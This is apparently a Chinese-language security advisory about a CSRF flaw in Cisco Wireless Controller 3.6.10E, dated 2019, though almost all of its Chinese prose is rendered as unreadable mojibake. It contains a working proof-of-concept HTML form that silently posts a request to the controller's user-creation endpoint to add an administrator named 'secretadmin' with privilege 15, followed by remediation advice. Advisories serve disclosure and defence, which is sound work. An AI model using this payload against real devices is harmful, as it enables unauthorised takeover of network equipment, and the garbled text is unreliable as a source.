Cisco Wireless Controller 3.6.10E CSRFÎó²îÇ徲ͨ¸æ
Ðû²¼Ê±¼ä 2019-07-26Îó²î±àºÅºÍ¼¶±ð
CVE±àºÅ£ºÔÝÎÞ£¬£¬£¬£¬£¬£¬Î£ÏÕ¼¶±ð£º¸ßΣ£¬£¬£¬£¬£¬£¬CVSS·ÖÖµ£º¹Ù·½Î´ÆÀ¶¨
Ó°Ïì°æ±¾
ÊÜÓ°ÏìµÄ°æ±¾
ÊÊÓÃÓÚCisco Wireless Controller 3.6.10E¡£¡£¡£
Îó²î¸ÅÊö
Cisco Wireless Controller 3.6.10EÊÇCiscoÐû²¼µÄÒ»¿îÎÞÏß¿ØÖÆÆ÷£¬£¬£¬£¬£¬£¬¿ÉΪҪº¦Ê¹ÃüÌṩ¿É¿¿µÄÐÔÄÜ¡£¡£¡£
Cisco Wireless Controller 3.6.10EÈÝÒ×Êܵ½CSRF¹¥»÷£¬£¬£¬£¬£¬£¬¹¥»÷Õß½«È«ÐÄÉè¼ÆµÄÇëÇó·¢Ë͸ø¾ßÓÐÖÎÀíÔ±¼¶±ð»á¼ûȨÏÞµÄÓû§£¬£¬£¬£¬£¬£¬·¿ªURLºó£¬£¬£¬£¬£¬£¬½«Í¨¹ýÖÎÀíÔ±µÄ»á»°Ìá½»±íµ¥£¬£¬£¬£¬£¬£¬²¢Àֳɽ«ÐÂÓû§Ìí¼ÓΪÖÎÀíÔ±¡£¡£¡£
Îó²îÑéÖ¤
<html>
<body>
<form action="http://IP/security/cfgSecurityAAAUsersCreate
<http://192.168.1.1/security/cfgSecurityAAAUsersCreate>" method="POST">
<input type="hidden" name="username" value="secretadmin" />
<input type="hidden" name="privilege" value="15" />
<input type="hidden" name="password" value="K3Y" />
<input type="hidden" name="description" value="CSRF" />
<input type="hidden" name="type" value="lobby-admin" />
<input type="hidden" name="cfnpassword" value="K3Y" />
<input type="hidden" name="yearlife" value="2013" />
<input type="hidden" name="hourlife" value="16" />
<input type="hidden" name="monthlife" value="7" />
<input type="hidden" name="minlife" value="17" />
<input type="hidden" name="datelife" value="16" />
<input type="hidden" name="seclife" value="0" />
</form>
</body>
</html>
ÐÞ¸´½¨Òé
1¡¢¹Ø×¢¹Ù·½ÍøÕ¾£¬£¬£¬£¬£¬£¬ÊµÊ±¾ÙÐиüУ»£»£»£»£»
2¡¢ÑéÖ¤HTTP Referer×ֶΣ»£»£»£»£»
3¡¢ÔÚÇëÇ󵨵ãÖÐÌí¼Ótoken²¢ÑéÖ¤£»£»£»£»£»
4¡¢ÔÚHTTPÍ·ÖÐ×Ô½ç˵ÊôÐÔ²¢ÑéÖ¤¡£¡£¡£